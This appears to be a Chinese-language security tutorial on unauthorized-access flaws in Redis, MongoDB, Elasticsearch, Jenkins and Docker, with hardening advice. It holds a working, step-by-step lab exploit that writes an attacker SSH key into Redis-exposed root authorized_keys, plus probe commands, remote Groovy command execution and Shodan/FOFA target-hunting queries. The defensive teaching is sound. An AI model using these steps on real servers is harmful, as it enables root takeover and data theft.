未授权访问漏洞测试：原理、危害与实战复现（附修复方案）

在当今数字化时代，网络安全已成为企业与个人不可忽视的重要课题。其中，未授权访问漏洞是常见且高危的安全隐患之一，一旦被攻击者利用，可能导致数据泄露、服务器被控甚至业务瘫痪。

本文将深入解析未授权访问漏洞的定义、常见类型、测试方法、实战复现流程，并提供切实可行的修复建议，帮助你全面掌握这一关键安全知识点。

什么是未授权访问漏洞？

未授权访问漏洞（Unauthorized Access Vulnerability）是指系统或服务在未进行有效身份验证或权限控制的情况下，允许外部用户直接访问敏感资源或执行关键操作。

这类漏洞通常出现在以下场景中：

• 服务默认开放，未设置访问控制；

• 配置不当，导致权限绕过；

• 缺少身份认证机制或使用弱口令；

• 管理界面暴露在公网且无登录限制。

常见的存在未授权访问风险的服务包括：

🔍 提示：在FOFA、Shodan等网络空间测绘平台搜索 port="6379"、app="Jenkins" 等语法，可快速发现潜在目标。

Redis未授权访问漏洞详解（实战案例）

Redis 是最典型的未授权访问漏洞代表之一。由于其高性能和广泛使用，若配置不当极易成为攻击入口。

1. 漏洞成因

当 Redis 服务绑定在 0.0.0.0:6379 并未设置密码认证（requirepass）时，任何能够访问该端口的用户都可以连接并执行命令，从而实现未授权操作。

2. 漏洞危害

• ✅ 敏感信息泄露：读取数据库中的用户数据、配置信息等；

• ✅ 数据篡改或清空：执行 FLUSHALL 清空所有数据；

• ✅ 远程代码执行（RCE）：通过 Lua 脚本或备份功能写入 Webshell；

• ✅ 获取服务器权限：将攻击者 SSH 公钥写入 /root/.ssh/authorized_keys，实现免密登录。

⚠️ 影响版本：Redis 2.x ~ 5.x（5.0.5之前版本尤为危险）

3. 漏洞复现步骤（Kali + CentOS 环境）

环境准备

• 攻击机：Kali Linux（IP: 192.168.206.149）

• 靶机：CentOS 7（安装 Redis，IP: 192.168.206.155，关闭防火墙）

步骤一：生成SSH密钥对

ssh-keygen -t rsa

一路回车，默认生成 id_rsa（私钥）和 id_rsa.pub（公钥）。

步骤二：格式化公钥并写入文件

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /root/mykey

💡 前后添加换行符，避免与其他缓存数据混合。

步骤三：上传公钥至Redis缓存

redis-cli -h 192.168.206.155 -p 6379 -x set sshkey < /root/mykey

-x 参数表示从标准输入读取 value。

步骤四：修改Redis持久化路径

redis-cli -h 192.168.206.155
> config set dir /root/.ssh
> config set dbfilename authorized_keys

将数据持久化文件保存为 /root/.ssh/authorized_keys。

步骤五：触发持久化保存

> save

此时，靶机的 /root/.ssh/authorized_keys 文件已包含攻击者的公钥。

步骤六：SSH免密登录靶机

ssh -i ~/.ssh/id_rsa root@192.168.206.155

成功登录，获得服务器最高权限！

其他常见未授权访问漏洞测试方法

1. MongoDB 未授权访问

# 连接MongoDB
mongo 192.168.0.100:27017

# 查看数据库列表
> show dbs

# 切换并查看集合
> use admin
> show collections

2. Elasticsearch 未授权访问

访问 http://target:9200/_cat/indices 或 http://target:9200/_nodes，若返回节点信息则存在漏洞。

3. Jenkins 未授权访问

进入 http://target:8080/manage/script，输入 Groovy 脚本：

println "whoami".execute().text

可执行系统命令。

4. Docker API 未授权访问

curl http://target:2375/version
curl http://target:2375/containers/json

可列出容器、创建新容器实现RCE。

如何检测未授权访问漏洞？

1. 手动检测

• 使用 nmap 扫描开放端口：

  nmap -p 6379,27017,9200,8080 target-ip

• 使用对应客户端工具连接测试：

  redis-cli -h target-ip
  mongo target-ip:27017

2. 自动化工具

• RedisScan.py：批量检测 Redis 弱口令与未授权访问；

• Nmap 脚本：

  nmap --script redis-info -p 6379 target-ip
  nmap --script http-enum -p 80,8080 target-ip

• Vulhub：搭建漏洞复现环境，用于学习与测试。

修复建议与安全加固方案

1. Redis 安全配置（redis.conf）

2. 通用安全建议

• 🔐 最小权限原则：服务不要以 root 用户运行；

• 🛡️ 防火墙限制：仅允许信任 IP 访问关键端口；

• 🔁 定期更新：及时升级软件版本，修复已知漏洞；

• 📊 日志监控：开启审计日志，及时发现异常行为；

• 🧩 禁用高危命令：如 FLUSHALL、CONFIG 等可重命名或禁用。

未授权访问漏洞看似简单，实则危害巨大。无论是 Redis、MongoDB 还是 Jenkins，一旦暴露在公网且缺乏安全配置，就可能成为黑客的“后门”。

作为系统管理员或安全从业者，必须做到：

✅ 不将服务随意暴露在公网
✅ 强制启用身份认证机制
✅ 定期进行安全扫描与渗透测试

只有未雨绸缪，才能真正构筑起网络安全的防线。

📌 关注我，获取更多网络安全实战教程